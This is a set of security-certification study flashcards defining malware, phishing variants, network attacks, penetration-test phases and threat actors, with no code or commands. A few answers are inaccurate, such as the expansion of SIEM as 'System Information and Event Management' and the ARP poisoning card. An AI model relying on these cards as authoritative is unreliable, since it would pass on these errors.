Domain 1.0: Attacks, Threats, and Vulnerabilities Flashcards

1
Q

Virus

A

Malicious computer program, infect systems and spread copies of themselves.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Worms

A

Similiar to virus, does not require host to replicate

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Trojan

A

Disguised malicious code within useful application

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Logic bombs

A

Trigger on a particular condition

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Rootkits

A

Installed and hidden on a computer mainly for the purpose of compromising the system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Ransonware

A

Encrypts the disk using crypto-malware and demand the ransom payment to provide decryption to release the data.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Spyware

A

Monitors browser & OS activity. Logs keystrokes and may impact computer performance.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What can cause a computer to run slowly and generate pop-up advertisement?

A

Spyware and adware

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Armored virus

A

Armored viruses use special tricks to make the tracing, disassembling, and understanding of their code more difficult.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Phishing

A

Social Engineering attack done mainly through email across a large audience

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Spear Phishing

A

Social engineering attack via email that aims an individual, or a group of individuals

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Whaling

A

Same as spear phishing, but with big or high-value targets such as CEO.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

Vishing

A

This is the term for voice phishing. Often uses fake caller ID to appear as trusted organization and attempt to get the individual to enter account details via the phone.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Pharming

A

Based on farming and phishing. It does not require user to be tricked into clicking on a link. Instead, it redirects victims to a bogus website, even if they correctly entered the intended site.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

DoS and DDoS

A

DoS - Denial of Service. DDoS - Distributed Denial of Service.

They involve disruption of normal network service and include attacks based on the ICMP echo reply called Smurf attacks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Spoofing

A

Process of making data look as if it came from a trusted or legitimate origin.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

On-path attack

A

A third system intercepts traffic between two systems by pretending to be the other system

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

Replay attacks

A

Reposting captured data

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

Zero-day vulnerability

A

Not detected by the antimalware software yet. No patches exist for them too.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

What includes repeated guessing of logons and passwords?

A

Password guessing, brute-force and dictionary attacks.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

Dictionary attacks

A

A dictionary attack is a method of breaking into a password-protected computer, network or other IT resource by systematically entering every word in a dictionary as a password

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

DNS poisoning

A

Redirect traffic by changing the IP record for a specific domain

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

ARP poisoning

A

Layer 2 attack that deceives a device on a network and poisons the MAC table associated with devices.

24
Q

What does XSRF stand for? What is it?

A

Cross Site Request Forgery

An attack in which the end user executes unwanted actions on a web application while currently authenticated.

25
Q

What does XSS stand and what is it?

A

Cross Site Scripting - it’s a vulnerability that can be used to hijack a user’s session

26
Q

Injection Attacks

A

It’s attack that includes SQL, LDAP, DLL and XML. These attacks insert code or malicious input to try to force unauthorized activity or access.

27
Q

Rogue access point

A

Unauthorized wireless access point

28
Q

What kind of attack rogue access point can provide to attackers?

A

On-path attack, which is also referred as evil twin.

29
Q

Bluejacking

A

Tricks user into accepting the prompt to establish bluetooth connection with an attacker’s device.

30
Q

Bluesnarfing

A

Following bluejacking, user’s data becomes available for unauthorized access, modification and deletion.

31
Q

What is the danger of unencrypted network traffic

A

They can be captured by packet sniffer and decode them from its raw form into readable form.

32
Q

Threat actor attributes include the actor’s relationship to the following:

A

Organization, motive, intent and capability.

33
Q

What are threat actor types?

A

Script kiddies, insiders, hacktivists, organized crime, competitors and nation-states.

34
Q

OSINT

A

Open Source Intelligence describes information for collection from publicly available information sources such as publications, geospatial information, and many online resources.

35
Q

Black-box test

A

the assessor have no information or knowledge about the inner workings of the system

36
Q

Four primary phases of a penetration test

A

planning, discovery, attack and report.

37
Q

White-box techniques

A

Often tests to see whether programming constructs are placed correctly and to carry out the required actions. The assessor have knowledge about the inner workings of the system or knowledge of the source code.

38
Q

Gray box testing

A

Combination of white and black box techniques. The test have some understanding or limited knowledge of the inner workings.

39
Q

What occurs during the attack phase of a penetration test?

A

Initial exploitation, escalation of privilege, pivot and persistence.

40
Q

Vulnerability scan

A

Identifies vulnerabilities, misconfigurations and lacking security controls

41
Q

Credentialed vulnerability scan reduces what issue?

A

False posiitives

42
Q

What is a race condition?

A

A race condition occurs when two or more threads can access shared data and they try to change it at the same time.

It can result in system malfunction and unexpected results. Resulting errors can cause crashes and may allow attackers to escalate their privileges.

43
Q

What problem can default accounts and password pose?

A

They can provide a simple means for an attacker to gain access.

44
Q

What attack can proper input handling prevent?

A

It prevents input that can impact data flow, which would allow an attacker to gain control of a system or remotely execute commands.

45
Q

What will happen if we turn off SSID broadcast?

A

It hides the network from appearing, but does not effectively protect a wireless network from attack.

46
Q

What is a false positive?

A

Typical or expected behavior is identified as irregular or malicious

47
Q

What is false negative?

A

An alert should been generated did not occur at all.

48
Q

SIEM

A

System Information and Event Management is a tool that collect, correlate, and display data feeds that support response activities.

49
Q

SOAR

A

Security Orchestration, Automation and Response - it combines security orchestration & automation with threat intelligence platforms and incident response platforms.

50
Q

Threat Hunting

A

Proactive approach to finding an attacker before alerts are triggered.

51
Q

Rogue access point

A

Unauthorized wireless access point set up

52
Q

What is bluejacking?

A

Attackers generate messages that appears to come from the device itself, leading users to follow obvious prompts and establish open Bluetooth connection to the attacker’s device.

53
Q

What is bluesnarfing?

A

Following successful & unauthorized Bluetooth connection, user’s data becomes open for unauthorized access, modification and deletion.

54
Q

What is danger of unencrypted traffic across the network?

A

Attacker can use packet sniffer to capture and decode them from its raw form into readable text.

55
Q

What does threat actor attributes include the actor’s relationship to?

A

Organization, motive, intent and capability

56
Q

What are types of threat actor?

A

Script kiddie, insiders, hacktivists, organized crime, competitors and nation-states.